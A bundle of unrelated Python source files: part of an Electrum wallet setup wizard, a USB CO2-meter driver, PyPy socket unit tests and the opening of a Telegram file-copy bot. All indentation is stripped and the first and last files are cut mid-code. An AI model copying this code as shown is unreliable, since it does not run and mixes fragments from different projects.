"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
CO2Meter.py
|
import sys
import fcntl
import threading
import weakref
CO2METER_CO2 = 0x50
CO2METER_TEMP = 0x42
CO2METER_HUM = 0x44
HIDIOCSFEATURE_9 = 0xC0094806
def _co2_worker(weak_self):
while True:
self = weak_self()
if self is None:
break
self._read_data()
if not self._running:
break
del self
class CO2Meter:
_key = [0xc4, 0xc6, 0xc0, 0x92, 0x40, 0x23, 0xdc, 0x96]
_device = ""
_values = {}
_file = ""
_running = True
_callback = None
def __init__(self, device="/dev/hidraw0", callback=None):
self._device = device
self._callback = callback
self._file = open(device, "a+b", 0)
if sys.version_info >= (3,):
set_report = [0] + self._key
fcntl.ioctl(self._file, HIDIOCSFEATURE_9, bytearray(set_report))
else:
set_report_str = "\x00" + "".join(chr(e) for e in self._key)
fcntl.ioctl(self._file, HIDIOCSFEATURE_9, set_report_str)
thread = threading.Thread(target=_co2_worker, args=(weakref.ref(self),))
thread.daemon = True
thread.start()
def _read_data(self):
try:
result = self._file.read(8)
if sys.version_info >= (3,):
data = list(result)
else:
data = list(ord(e) for e in result)
decrypted = self._decrypt(data)
if decrypted[4] != 0x0d or (sum(decrypted[:3]) & 0xff) != decrypted[3]:
print(self._hd(data), " => ", self._hd(decrypted), "Checksum error")
else:
operation = decrypted[0]
val = decrypted[1] << 8 | decrypted[2]
self._values[operation] = val
if self._callback is not None:
if operation == CO2METER_CO2:
self._callback(sensor=operation, value=val)
elif operation == CO2METER_TEMP:
self._callback(sensor=operation,
value=round(val / 16.0 - 273.15, 1))
elif operation == CO2METER_HUM:
self._callback(sensor=operation, value=round(val / 100.0, 1))
except:
self._running = False
def _decrypt(self, data):
cstate = [0x48, 0x74, 0x65, 0x6D, 0x70, 0x39, 0x39, 0x65]
shuffle = [2, 4, 0, 7, 1, 6, 5, 3]
phase1 = [0] * 8
for i, j in enumerate(shuffle):
phase1[j] = data[i]
phase2 = [0] * 8
for i in range(8):
phase2[i] = phase1[i] ^ self._key[i]
phase3 = [0] * 8
for i in range(8):
phase3[i] = ((phase2[i] >> 3) | (phase2[(i-1+8)%8] << 5)) & 0xff
ctmp = [0] * 8
for i in range(8):
ctmp[i] = ((cstate[i] >> 4) | (cstate[i]<<4)) & 0xff
out = [0] * 8
for i in range(8):
out[i] = (0x100 + phase3[i] - ctmp[i]) & 0xff
return out
@staticmethod
def _hd(data):
return " ".join("%02X" % e for e in data)
def get_co2(self):
if not self._running:
raise IOError("worker thread couldn't read data")
result = {}
if CO2METER_CO2 in self._values:
result = {'co2': self._values[CO2METER_CO2]}
return result
def get_temperature(self):
if not self._running:
raise IOError("worker thread couldn't read data")
result = {}
if CO2METER_TEMP in self._values:
result = {'temperature': round((self._values[CO2METER_TEMP]/16.0-273.15),1)}
return result
def get_humidity(self): # not implemented by all devices
if not self._running:
raise IOError("worker thread couldn't read data")
result = {}
if CO2METER_HUM in self._values:
result = {'humidity': (self._values[CO2METER_HUM]/100.0)}
return result
def get_data(self):
result = {}
result.update(self.get_co2())
result.update(self.get_temperature())
result.update(self.get_humidity())
return result
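# Minimal usage sketch (not part of the original module): poll the meter once per
# second and print the combined readings. The device path "/dev/hidraw0" and the
# polling interval are assumptions; adjust them for your setup.
if __name__ == "__main__":
    import time

    meter = CO2Meter("/dev/hidraw0")
    try:
        while True:
            # get_data() merges whatever readings have arrived so far; it may be
            # empty right after start-up until the first frames are decoded.
            print(meter.get_data())
            time.sleep(1)
    except KeyboardInterrupt:
        pass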
|
test_rsocket.py
|
from __future__ import print_function
import pytest
import errno, os, sys
from rpython.rlib import rsocket
from rpython.rlib.rsocket import *
import socket as cpy_socket
from rpython.translator.c.test.test_genc import compile
from rpython.rlib.buffer import RawByteBuffer
try:
import fcntl
except ImportError:
fcntl = None
def setup_module(mod):
rsocket_startup()
def do_recv_from_recvmsg(socket, buffersize, flags=0):
msg, data, flag, address = socket.recvmsg(buffersize, flags=flags)
return msg
def do_recv_from_recvinto(socket, buffersize, flags=0):
buf = RawByteBuffer(buffersize)
read_bytes = socket.recvinto(buf, buffersize, flags=flags)
return buf.as_str()[:read_bytes]
def do_recv_from_recvmsg_into(socket, buffersize, flags=0):
l1 = buffersize // 2
l2 = buffersize - l1
buf1, buf2 = RawByteBuffer(l1), RawByteBuffer(l2)
n, data, flag, address = socket.recvmsg_into([buf1, buf2], flags=flags)
n1 = min(n, l1)
n2 = n - n1
return buf1.as_str()[:n1] + buf2.as_str()[:n2]
fix = [(RSocket.recv, "recv"), (do_recv_from_recvinto, "recvinto")]
if rsocket._c.HAVE_SENDMSG:
fix += [(do_recv_from_recvmsg, 'recvmsg'), (do_recv_from_recvmsg_into, "recvmsg_into")]
params, ids = zip(*fix)
@pytest.fixture(scope="module", params=params, ids=ids)
def do_recv(request):
return request.param
def test_ipv4_addr():
a = INETAddress("localhost", 4000)
assert a.get_host() == "127.0.0.1"
assert a.get_port() == 4000
a = INETAddress("", 4001)
assert a.get_host() == "0.0.0.0"
assert a.get_port() == 4001
a = INETAddress("<broadcast>", 47002)
assert a.get_host() == "255.255.255.255"
assert a.get_port() == 47002
res = repr(a)
assert res == "<INETAddress 255.255.255.255:47002>"
with pytest.raises(GAIError):
INETAddress("no such host exists", 47003)
@pytest.mark.skipif(getattr(rsocket, 'AF_UNIX', None) is None,
reason='AF_UNIX not supported.')
def test_unix_addr():
a = UNIXAddress("/tmp/socketname")
assert a.get_path() == "/tmp/socketname"
@pytest.mark.skipif(getattr(rsocket, 'AF_NETLINK', None) is None,
reason='AF_NETLINK not supported.')
def test_netlink_addr():
pid = 1
group_mask = 64 + 32
a = NETLINKAddress(pid, group_mask)
assert a.get_pid() == pid
assert a.get_groups() == group_mask
def test_gethostname():
s = gethostname()
assert isinstance(s, str)
def test_gethostbyname():
for host in ["localhost", "127.0.0.1"]:
a = gethostbyname(host)
assert isinstance(a, INETAddress)
assert a.get_host() == "127.0.0.1"
def test_gethostbyname_ex():
for host in ["localhost", "127.0.0.1"]:
name, aliases, address_list = gethostbyname_ex(host)
allnames = [name] + aliases
for n in allnames:
assert isinstance(n, str)
if sys.platform != 'win32':
assert host in allnames
for a in address_list:
if isinstance(a, INETAddress) and a.get_host() == "127.0.0.1":
break # ok
# no IPV6, should always return IPV4
else:
pytest.fail("could not find the localhost address in %r"
% (address_list,))
def test_gethostbyaddr():
try:
cpy_socket.gethostbyaddr("::1")
except cpy_socket.herror:
ipv6 = HSocketError
except cpy_socket.gaierror:
ipv6 = GAIError
else:
ipv6 = None
for host in ["localhost", "127.0.0.1", "::1"]:
if host == "::1" and ipv6:
with pytest.raises(ipv6):
gethostbyaddr(host)
continue
name, aliases, address_list = gethostbyaddr(host)
allnames = [name] + aliases
for n in allnames:
assert isinstance(n, str)
if sys.platform != 'win32':
assert 'localhost' in allnames or 'ip6-localhost' in allnames
for a in address_list:
if isinstance(a, INETAddress) and a.get_host() == "127.0.0.1":
break # ok
if host != '127.0.0.1': # name lookup might return IPV6
if isinstance(a, INET6Address) and a.get_host() == "::1":
break # ok
else:
pytest.fail("could not find the localhost address in %r"
% (address_list,))
def test_getservbyname():
assert getservbyname('http') == 80
assert getservbyname('http', 'tcp') == 80
def test_getservbyport():
assert getservbyport(80) == cpy_socket.getservbyport(80)
assert getservbyport(80, 'tcp') == cpy_socket.getservbyport(80)
def test_getprotobyname():
assert getprotobyname('tcp') == IPPROTO_TCP
assert getprotobyname('udp') == IPPROTO_UDP
@pytest.mark.skipif(sys.platform == "win32",
reason='No socketpair on Windows')
def test_socketpair(do_recv):
s1, s2 = socketpair()
s1.sendall('?')
buf = do_recv(s2, 100)
assert buf == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
buf = do_recv(s1, 100)
assert buf == 'x'*count
s1.close()
s2.close()
@pytest.mark.skipif(sys.platform == "win32",
reason='No socketpair on Windows')
def test_socketpair_inheritable():
for inh in [False, True]:
s1, s2 = socketpair(inheritable=inh)
assert sock_get_inheritable(s1.fd) == inh
assert sock_get_inheritable(s2.fd) == inh
s1.close()
s2.close()
@pytest.mark.skipif(sys.platform == "win32",
reason='No socketpair on Windows')
def test_socketpair_recvinto():
class Buffer:
def __init__(self):
self._p = lltype.malloc(rffi.CCHARP.TO, 100, flavor='raw',
track_allocation=False)
def _as_str(self, count):
return rffi.charpsize2str(self._p, count)
def get_raw_address(self):
return self._p
s1, s2 = socketpair()
buf = Buffer()
s1.sendall('?')
n = s2.recvinto(buf, 1)
assert n == 1
assert buf._as_str(1) == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
n = s1.recvinto(buf, 100)
assert n == count
assert buf._as_str(n) == 'x'*count
s1.close()
s2.close()
@pytest.mark.skipif(sys.platform == "win32",
reason='No socketpair on Windows')
def test_socketpair_recvfrom_into():
class Buffer:
def __init__(self):
self._p = lltype.malloc(rffi.CCHARP.TO, 100, flavor='raw',
track_allocation=False)
def _as_str(self, count):
return rffi.charpsize2str(self._p, count)
def get_raw_address(self):
return self._p
s1, s2 = socketpair()
buf = Buffer()
s1.sendall('?')
n, addr = s2.recvfrom_into(buf, 1)
assert n == 1
assert addr is None
assert buf._as_str(1) == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
n, addr = s1.recvfrom_into(buf, 100)
assert n == count
assert addr is None
assert buf._as_str(n) == 'x'*count
s1.close()
s2.close()
def test_simple_tcp(do_recv):
from rpython.rlib import rthread
sock = RSocket()
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print('binding to port %d:' % (port,), end=' ')
try:
sock.bind(INETAddress('127.0.0.1', port))
print('works')
break
except SocketError as e: # should get a "Permission denied"
print(e)
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(sock.getsockname())
sock.listen(1)
s2 = RSocket(AF_INET, SOCK_STREAM)
s2.settimeout(1.0) # test one side with timeouts so select is used, shouldn't affect test
connected = [False] # thread-mutable list
def connecting():
try:
s2.connect(addr)
connected[0] = True
finally:
lock.release()
lock = rthread.allocate_lock()
lock.acquire(True)
rthread.start_new_thread(connecting, ())
print('waiting for connection')
fd1, addr2 = sock.accept()
s1 = RSocket(fd=fd1)
print('connection accepted')
lock.acquire(True)
assert connected[0]
print('connecting side knows that the connection was accepted too')
assert addr.eq(s2.getpeername())
#assert addr2.eq(s2.getsockname())
assert addr2.eq(s1.getpeername())
s1.send('?')
print('sent one character')
buf = do_recv(s2, 100)
assert buf == '?'
print('received ok')
def sendstuff():
print('sending')
s2.sendall('x'*50000)
print('sent')
rthread.start_new_thread(sendstuff, ())
buf = ''
while len(buf) < 50000:
data = do_recv(s1, 50100)
print('recv returned %d bytes' % (len(data),))
assert data
buf += data
assert buf == 'x'*50000
print('data received ok')
s1.shutdown(SHUT_RDWR)
s1.close()
s2.close()
def test_simple_udp(do_recv):
s1 = RSocket(AF_INET, SOCK_DGRAM)
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print('binding to port %d:' % (port,), end=' ')
try:
s1.bind(INETAddress('127.0.0.1', port))
print('works')
break
except SocketError as e: # should get a "Permission denied"
print(e)
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(s1.getsockname())
s2 = RSocket(AF_INET, SOCK_DGRAM)
s2.settimeout(10.0) # test one side with timeouts so select is used, shouldn't affect test
s2.bind(INETAddress('127.0.0.1', INADDR_ANY))
addr2 = s2.getsockname()
s1.sendto('?', 1, 0, addr2)
buf = do_recv(s2, 100)
assert buf == '?'
s2.connect(addr)
count = s2.send('x'*99)
assert 1 <= count <= 99
buf, addr3 = s1.recvfrom(100)
assert buf == 'x'*count
print(addr2, addr3)
assert addr2.get_port() == addr3.get_port()
s1.close()
s2.close()
def test_nonblocking(do_recv):
sock = RSocket()
sock.setblocking(False)
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print('binding to port %d:' % (port,), end=' ')
try:
sock.bind(INETAddress('127.0.0.1', port))
print('works')
break
except SocketError as e: # should get a "Permission denied"
print(e)
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(sock.getsockname())
sock.listen(1)
with pytest.raises(CSocketError) as err:
sock.accept()
assert err.value.errno in (errno.EAGAIN, errno.EWOULDBLOCK)
s2 = RSocket(AF_INET, SOCK_STREAM)
s2.setblocking(False)
with pytest.raises(CSocketError) as err:
s2.connect(addr)
assert err.value.errno in (errno.EINPROGRESS, errno.EWOULDBLOCK)
fd1, addr2 = sock.accept()
s1 = RSocket(fd=fd1)
s1.setblocking(False)
assert addr.eq(s2.getpeername())
assert addr2.get_port() == s2.getsockname().get_port()
assert addr2.eq(s1.getpeername())
err = s2.connect_ex(addr) # should now work
assert err in (0, errno.EISCONN)
s1.send('?')
import time
time.sleep(0.01) # Windows needs some time to transfer data
buf = do_recv(s2, 100)
assert buf == '?'
with pytest.raises(CSocketError) as err:
do_recv(s1, 5000)
assert err.value.errno in (errno.EAGAIN, errno.EWOULDBLOCK)
count = s2.send('x'*50000)
assert 1 <= count <= 50000
while count: # Recv may return less than requested
buf = do_recv(s1, count + 100)
assert len(buf) <= count
assert buf.count('x') == len(buf)
count -= len(buf)
# Check that everything has been read
with pytest.raises(CSocketError):
do_recv(s1, 5000)
s1.close()
s2.close()
def test_inheritable():
for inh in [False, True]:
s1 = RSocket(inheritable=inh)
assert sock_get_inheritable(s1.fd) == inh
s1.close()
def test_getaddrinfo_http():
lst = getaddrinfo('localhost', 'http')
assert isinstance(lst, list)
found = False
for family, socktype, protocol, canonname, addr in lst:
if (family == AF_INET and
socktype == SOCK_STREAM and
addr.get_host() == '127.0.0.1' and
addr.get_port() == 80):
found = True
assert found, lst
# The following might fail if the DNS redirects failed requests to a
# catch-all address (i.e. opendns).
with pytest.raises(GAIError) as e:
getaddrinfo('www.very-invalidaddress.com', None)
assert isinstance(e.value.get_msg(), str)
assert isinstance(e.value.get_msg_unicode(), unicode)
def getaddrinfo_pydotorg(i, result):
lst = getaddrinfo('python.org', None)
assert isinstance(lst, list)
found = False
for family, socktype, protocol, canonname, addr in lst:
if addr.get_host() in ('138.197.63.241', '104.130.43.121',
'23.253.135.79', '45.55.99.72'):
found = True
elif family == AF_INET:
print('pydotorg changed to', addr.get_host())
result[i] += found
def test_getaddrinfo_pydotorg():
result = [0]
getaddrinfo_pydotorg(0, result)
assert result[0] == 1
def test_getaddrinfo_no_reverse_lookup():
# It seems that getaddrinfo never runs a reverse lookup on Linux.
# Python2.3 on Windows returns the hostname.
lst = getaddrinfo('82.94.164.162', None, flags=AI_NUMERICHOST)
assert isinstance(lst, list)
found = False
print(lst)
for family, socktype, protocol, canonname, addr in lst:
assert 'python.org' not in canonname
if addr.get_host() == '82.94.164.162':
found = True
assert found, lst
def test_getaddrinfo_osx_crash():
# see CPython issue17269
for port in [None, '0', '00']:
getaddrinfo('localhost', port, 0, 0, 0, AI_NUMERICSERV)
def test_connect_ex():
s = RSocket()
err = s.connect_ex(INETAddress('0.0.0.0', 0)) # should not work
assert err in (errno.ECONNREFUSED, errno.EADDRNOTAVAIL)
s.close()
def test_connect_with_timeout_fail():
s = RSocket()
s.settimeout(0.1)
with pytest.raises(SocketTimeout):
s.connect(INETAddress('172.30.172.30', 12345))
s.close()
def test_connect_with_timeout_succeed():
s = RSocket()
s.settimeout(10.0)
s.connect(INETAddress('python.org', 80))
s.close()
def test_connect_with_default_timeout_fail():
rsocket.setdefaulttimeout(0.1)
s = RSocket()
rsocket.setdefaulttimeout(None)
assert s.gettimeout() == 0.1
with pytest.raises(SocketTimeout):
s.connect(INETAddress('172.30.172.30', 12345))
s.close()
def test_getsetsockopt():
import struct
assert struct.calcsize("i") == rffi.sizeof(rffi.INT)
# A socket should start with reuse == 0
s = RSocket(AF_INET, SOCK_STREAM)
reuse = s.getsockopt_int(SOL_SOCKET, SO_REUSEADDR)
assert reuse == 0
s.setsockopt_int(SOL_SOCKET, SO_REUSEADDR, 1)
reuse = s.getsockopt_int(SOL_SOCKET, SO_REUSEADDR)
assert reuse != 0
# Test string case
s = RSocket(AF_INET, SOCK_STREAM)
reusestr = s.getsockopt(SOL_SOCKET, SO_REUSEADDR, rffi.sizeof(rffi.INT))
value, = struct.unpack("i", reusestr)
assert value == 0
optstr = struct.pack("i", 1)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, optstr)
reusestr = s.getsockopt(SOL_SOCKET, SO_REUSEADDR, rffi.sizeof(rffi.INT))
value, = struct.unpack("i", reusestr)
assert value != 0
def test_getsetsockopt_global():
# A socket should start with reuse == 0
s = RSocket(AF_INET, SOCK_STREAM)
fd = s.fd
reuse = getsockopt_int(fd, SOL_SOCKET, SO_REUSEADDR)
assert reuse == 0
s.setsockopt_int(SOL_SOCKET, SO_REUSEADDR, 1)
reuse = getsockopt_int(fd, SOL_SOCKET, SO_REUSEADDR)
assert reuse != 0
@pytest.mark.skipif(sys.platform == 'win32', reason='requires bound socket')
def test_get_socket_family():
s = RSocket(AF_INET, SOCK_STREAM)
fd = s.fd
assert get_socket_family(fd) == AF_INET
if getattr(rsocket, 'AF_UNIX', None) is not None:
s = RSocket(AF_UNIX)
fd = s.fd
assert get_socket_family(fd) == AF_UNIX
def test_dup():
s = RSocket(AF_INET, SOCK_STREAM)
try:
s.bind(INETAddress('localhost', 50007))
if sys.platform == "win32":
assert not hasattr(s, 'dup')
return
s2 = s.dup()
try:
assert s.fd != s2.fd
assert s.getsockname().eq(s2.getsockname())
finally:
s2.close()
finally:
s.close()
def test_c_dup():
# rsocket.dup() duplicates fd, it also works on Windows
# (but only on socket handles!)
s = RSocket(AF_INET, SOCK_STREAM)
try:
s.bind(INETAddress('localhost', 50007))
s2 = RSocket(fd=dup(s.fd))
try:
assert s.fd != s2.fd
assert s.getsockname().eq(s2.getsockname())
finally:
s2.close()
finally:
s.close()
def test_inet_aton():
assert inet_aton('1.2.3.4') == '\x01\x02\x03\x04'
assert inet_aton('127.0.0.1') == '\x7f\x00\x00\x01'
tests = ["127.0.0.256", "127.0.0.255555555555555555", "127.2b.0.0",
"127.2.0.0.1", "127.2.0."]
for ip in tests:
with pytest.raises(SocketError):
inet_aton(ip)
# Windows 2000: missing numbers are replaced by 0
for ip, aton in [("11..22.33", '\x0b\x00\x16\x21'),
(".11.22.33", '\x00\x0b\x16\x21')]:
try:
assert inet_aton(ip) == aton
except SocketError:
pass
def test_inet_ntoa():
assert inet_ntoa('\x01\x02\x03\x04') == '1.2.3.4'
@pytest.mark.skipif(not hasattr(rsocket, 'inet_pton'), reason="no inet_pton()")
def test_inet_pton():
assert inet_pton(AF_INET, '1.2.3.5') == '\x01\x02\x03\x05'
with pytest.raises(SocketError):
inet_pton(AF_INET, '127.0.0.256')
@pytest.mark.skipif(not hasattr(rsocket, 'inet_ntop'), reason="no inet_ntop()")
def test_inet_ntop():
assert inet_ntop(AF_INET, '\x01\x02\x03\x05') == '1.2.3.5'
@pytest.mark.skipif(getattr(rsocket, 'AF_UNIX', None) is None,
reason='AF_UNIX not supported.')
def test_unix_socket_connect(tmpdir, do_recv):
prev_dir = tmpdir.chdir() # workaround for limited path length
try:
do_test_unix_socket_connect(do_recv)
finally:
prev_dir.chdir()
def do_test_unix_socket_connect(do_recv):
sockpath = './test_unix_socket_connect'
a = UNIXAddress(sockpath)
serversock = RSocket(AF_UNIX)
serversock.bind(a)
serversock.listen(1)
clientsock = RSocket(AF_UNIX)
clientsock.connect(a)
fd, addr = serversock.accept()
s = RSocket(AF_UNIX, fd=fd)
s.send('X')
data = do_recv(clientsock, 100)
assert data == 'X'
clientsock.send('Y')
data = do_recv(s, 100)
assert data == 'Y'
clientsock.close()
s.close()
class TestTCP:
PORT = 50007
HOST = 'localhost'
def setup_method(self, method):
self.serv = RSocket(AF_INET, SOCK_STREAM)
self.serv.bind(INETAddress(self.HOST, self.PORT))
self.serv.listen(1)
def teardown_method(self, method):
self.serv.close()
self.serv = None
def test_timeout(self):
self.serv.settimeout(1.0)
with pytest.raises(SocketTimeout):
self.serv.accept()
def test_timeout_zero(self):
self.serv.settimeout(0.0)
with pytest.raises(SocketError):
foo = self.serv.accept()
def _test_cond_include(cond):
# Test that _rsocket_rffi is importable even on platforms where
# AF_PACKET or AF_NETLINK is not defined.
import re
from rpython.rlib import _rsocket_rffi
srcfile = _rsocket_rffi.__file__
if srcfile.lower().endswith('c') or srcfile.lower().endswith('o'):
srcfile = srcfile[:-1] # .pyc => .py
assert srcfile.lower().endswith('.py')
sourcelines = open(srcfile, 'rb').read().splitlines()
found = False
for i, line in enumerate(sourcelines):
line2 = re.sub(r"(\s*COND_HEADER\s*=)",
r"\1'#undef %s\\n'+" % cond,
line)
if line2 != line:
found = True
sourcelines[i] = line2
assert found
d = {}
sourcelines.append('')
exec('\n'.join(sourcelines), d)
def test_no_AF_PACKET():
_test_cond_include('AF_PACKET')
def test_no_AF_NETLINK():
_test_cond_include('AF_NETLINK')
@pytest.mark.xfail(reason="hits non-thread-safe issues with ll2ctypes")
def test_thread_safe_gethostbyaddr():
import threading
nthreads = 10
ip = '8.8.8.8'
domain = gethostbyaddr(ip)[0]
result = [0] * nthreads
threads = [None] * nthreads
lock = threading.Lock()
def lookup_addr(ip, i):
name, aliases, address_list = gethostbyaddr(ip, lock)
if name == domain:
result[i] += 1
for i in range(nthreads):
threads[i] = threading.Thread(target = lookup_addr, args=[ip, i])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
@pytest.mark.xfail(reason="hits non-thread-safe issues with ll2ctypes")
def test_thread_safe_gethostbyname_ex():
import threading
nthreads = 10
domain = 'google.com'
result = [0] * nthreads
threads = [None] * nthreads
lock = threading.Lock()
def lookup_name(i):
name, aliases, address_list = gethostbyname_ex(domain, lock)
if name == domain:
result[i] += 1
for i in range(nthreads):
threads[i] = threading.Thread(target = lookup_name, args=[i])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
@pytest.mark.xfail(reason="hits non-thread-safe issues with ll2ctypes")
def test_getaddrinfo_pydotorg_threadsafe():
import threading
nthreads = 10
result = [0] * nthreads
threads = [None] * nthreads
for i in range(nthreads):
threads[i] = threading.Thread(target = getaddrinfo_pydotorg, args=[i, result])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
def test_translate_netdb_lock():
def f():
rsocket_startup()
gethostbyaddr("localhost")
return 0
fc = compile(f, [])
assert fc() == 0
def test_translate_netdb_lock_thread():
def f():
rsocket_startup()
gethostbyaddr("localhost")
return 0
fc = compile(f, [], thread=True)
assert fc() == 0
def test_socket_saves_errno(do_recv):
# ensure errno is set to a known value...
unconnected_sock = RSocket()
with pytest.raises(CSocketError) as e:
do_recv(unconnected_sock, 1024)
# ...which is ENOTCONN
assert e.value.errno == errno.ENOTCONN
with pytest.raises(CSocketError) as e:
RSocket(family=AF_INET, type=SOCK_STREAM, proto=SOL_UDP)
assert e.value.errno in (errno.EPROTOTYPE, errno.EPROTONOSUPPORT)
@pytest.mark.skipif(fcntl is None, reason="requires fcntl")
def test_socket_init_non_blocking():
import fcntl, os
s = RSocket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK)
assert s.type == SOCK_STREAM
assert s.gettimeout() == 0.0
assert fcntl.fcntl(s.fd, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK
# It is a bad idea to change running system's hostname, so do it only
# if we can reasonably assume the request will be rejected, i.e. we don't
# have superuser privileges.
@pytest.mark.skipif(sys.platform == "win32",
reason='No sethostname on Windows')
@pytest.mark.skipif(not hasattr(os, 'geteuid') or os.geteuid() == 0,
reason='Running as superuser is not supported.')
def test_sethostname():
# just in case it worked anyway, use the old hostname
s = gethostname()
with pytest.raises(CSocketError) as e:
sethostname(s)
assert e.value.errno == errno.EPERM
|
iCopy.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os, sys, logging
from telegram import Bot
from telegram.utils.request import Request as TGRequest
from utils import load
from telegram.ext import (
Updater,
CommandHandler,
MessageHandler,
Filters,
CallbackQueryHandler,
ConversationHandler,
)
from utils import (
get_set as _set,
get_functions as _func,
task_box as _box,
task_payload as _payload,
callback_stage as _stage,
__version__,
)
from workflow import (
start_workflow as _start,
quick_workflow as _quick,
copy_workflow as _copy,
size_workflow as _size,
regex_workflow as _regex,
purge_workflow as _purge,
dedupe_workflow as _dedupe,
)
from multiprocessing import Process as _mp, Manager
from threading import Thread
from utils.load import ns
#from web import dash
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
logger = logging.getLogger(__name__)
# ############################### Main ####################################
def main():
### bot definition
request = TGRequest(con_pool_size=8)
bot = Bot(token=f"{load.cfg['tg']['token']}", request=request)
updater = Updater(bot=bot, use_context=True)
### check whether this launch is a restart
is_restart = load.db_counters.find_one({"_id": "is_restart"})
if is_restart is not None:
if is_restart["status"] == 0:
pass
else:
_func.check_restart(bot)
else:
load.db_counters.update(
{"_id": "is_restart"}, {"status": 0}, upsert=True,
)
dp = updater.dispatcher
# Entry Conversation
conv_handler = ConversationHandler(
entry_points=[
# Entry Points
CommandHandler("set", _set._setting),
CommandHandler("menu", _start.menu),
CommandHandler("quick", _quick.quick),
CommandHandler("copy", _copy.copy),
CommandHandler("task", _box.taskinfo),
CommandHandler("size", _size.size),
CommandHandler("purge", _purge.purge),
CommandHandler("dedupe", _dedupe.dedupe),
MessageHandler(
Filters.regex(pattern=load.regex_entry_pattern), _regex.regex_entry
),
],
states={
_stage.SET_FAV_MULTI: [
# fav settings function
MessageHandler(Filters.text, _set._multi_settings_recieved),
],
_stage.CHOOSE_MODE: [
# dispatch to the handler selected by the callback pattern
CallbackQueryHandler(_quick.quick, pattern="quick"),
CallbackQueryHandler(_copy.copy, pattern="copy"),
],
_stage.GET_LINK: [
# get Shared_Link states
